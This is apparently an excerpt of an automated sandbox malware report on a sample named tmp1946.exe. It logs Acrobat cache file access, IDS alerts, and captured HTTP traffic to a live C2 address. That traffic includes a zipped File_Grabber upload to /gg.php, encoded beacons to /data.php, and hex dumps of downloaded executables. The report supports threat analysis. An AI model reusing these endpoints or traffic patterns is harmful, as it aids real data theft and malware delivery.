      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\FilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.5:49808 -> 185.81.68.147:80
      Posts data to a JPG file (protocol mismatch)
      Source: unknownHTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 89184Content-Type: multipart/form-data; boundary=------------------------KP8UOnaSGiZUFlAIy5XNqtData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4b 50 38 55 4f 6e 61 53 47 69 5a 55 46 6c 41 49 79 35 58 4e 71 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 73 c5 8f 68 b9 00 00 00 c1 01 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 ad 90 cd 0a c2 30 10 84 cf f5 3d 7a 6c 68 7e 4c 93 05 4f 1e 7d 07 21 4d 13 1a a8 4d 69 52 b1 e2 c3 5b 2d 42 41 2b 1e 3c 2d bb c3 32 f3 4d 1d 63 17 a0 1b 42 8d 82 e9 cf 4e 9b 80 4e fe ea 9a 46 21 ed 4f c0 18 05 04 40 93 3c c1 92 53 96 d4 3f 3c 7c 57 a1 05 cc a5 cc b1 10 54 40 4d 61 7c ec 9c 11 2e 68 3e 89 70 6b a7 d3 66 36 52 5a fb a1 8d 01 59 d7 1b eb 2f 8b 50 c7 4e f5 d1 45 e7 db 83 19 77 29 11 aa f4 43 4c c9 fe 39 91 b1 44 15 55 b5 cd 24 2d 75 c6 70 61 33 c5 a5 c8 30 23 9a 62 cc 05 67 f6 95 2d 25 f2 0d 71 d5 79 55 58 82 91 0f 60 7f 0e 3c d7 74 07 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 aa 13 38 0b 00 00 00 09 00 00 00 61 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 43 5f 5f 57 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Dec 2024 11:05:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 25 Dec 2024 01:47:03 GMTETag: "5a452f-62a0e67fff3c0"Accept-Ranges: bytesContent-Length: 5915951Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 17 64 6b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 49 2f 5b 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Dec 2024 11:05:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 24 Dec 2024 20:31:17 GMTETag: "f7c00-62a09febaef40"Accept-Ranges: bytesContent-Length: 1014784Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 4a 34 37 a6 2b 5a 64 a6 2b 5a 64 a6 2b 5a 64 ed 53 59 65 a1 2b 5a 64 ed 53 5f 65 6b 2b 5a 64 65 a8 a7 64 a1 2b 5a 64 65 a8 59 65 ac 2b 5a 64 65 a8 5e 65 b4 2b 5a 64 65 a8 5f 65 f5 2b 5a 64 ed 53 5e 65 b4 2b 5a 64 b2 af 5e 65 d8 2b 5a 64 c9 5d f0 64 a1 2b 5a 64 a6 2b 5b 64 b6 2a 5a 64 ed 53 5b 65 bf 2b 5a 64 b2 af 53 65 b5 2b 5a 64 b2 af 5a 65 a7 2b 5a 64 b2 af 58 65 a7 2b 5a 64 52 69 63 68 a6 2b 5a 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 15 1a 6b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 5e 0b 00 00 3e 04 00 00 00 00 00 a8 a2 07 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 9c 0e 00 58 00 00 00 68 9c 0e 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 10 0f 00 24 96 00 00 00 00 00 00 00 00 00 00 00 b0 0f 00 b8 14 00 00 20 bf 0d 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 bd 0d 00 40 01 00 00 00 00 00 00 00 00 00 00 00 70 0b 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 5d 0b 00 00 10 00 00 00 5e 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 44 03 00 00 70 0b 00 00 46 03 00 00 62 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 48 00 00 00 c0 0e 00 00 26 00 00 00 a8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 24 96 00 00 00 10 0f 00 00 98 00 00 00 ce 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b8 14 00 00 00 b0 0f 00 00 16 00 00 00 66 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 89184Content-Type: multipart/form-data; boundary=------------------------KP8UOnaSGiZUFlAIy5XNqtData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4b 50 38 55 4f 6e 61 53 47 69 5a 55 46 6c 41 49 79 35 58 4e 71 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 73 c5 8f 68 b9 00 00 00 c1 01 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 ad 90 cd 0a c2 30 10 84 cf f5 3d 7a 6c 68 7e 4c 93 05 4f 1e 7d 07 21 4d 13 1a a8 4d 69 52 b1 e2 c3 5b 2d 42 41 2b 1e 3c 2d bb c3 32 f3 4d 1d 63 17 a0 1b 42 8d 82 e9 cf 4e 9b 80 4e fe ea 9a 46 21 ed 4f c0 18 05 04 40 93 3c c1 92 53 96 d4 3f 3c 7c 57 a1 05 cc a5 cc b1 10 54 40 4d 61 7c ec 9c 11 2e 68 3e 89 70 6b a7 d3 66 36 52 5a fb a1 8d 01 59 d7 1b eb 2f 8b 50 c7 4e f5 d1 45 e7 db 83 19 77 29 11 aa f4 43 4c c9 fe 39 91 b1 44 15 55 b5 cd 24 2d 75 c6 70 61 33 c5 a5 c8 30 23 9a 62 cc 05 67 f6 95 2d 25 f2 0d 71 d5 79 55 58 82 91 0f 60 7f 0e 3c d7 74 07 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 aa 13 38 0b 00 00 00 09 00 00 00 61 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 43 5f 5f 57 6
      Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
      Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49708 -> 185.81.68.147:80
      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49708 -> 185.81.68.147:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49716 -> 185.81.68.147:80
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 185.81.68.147Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: 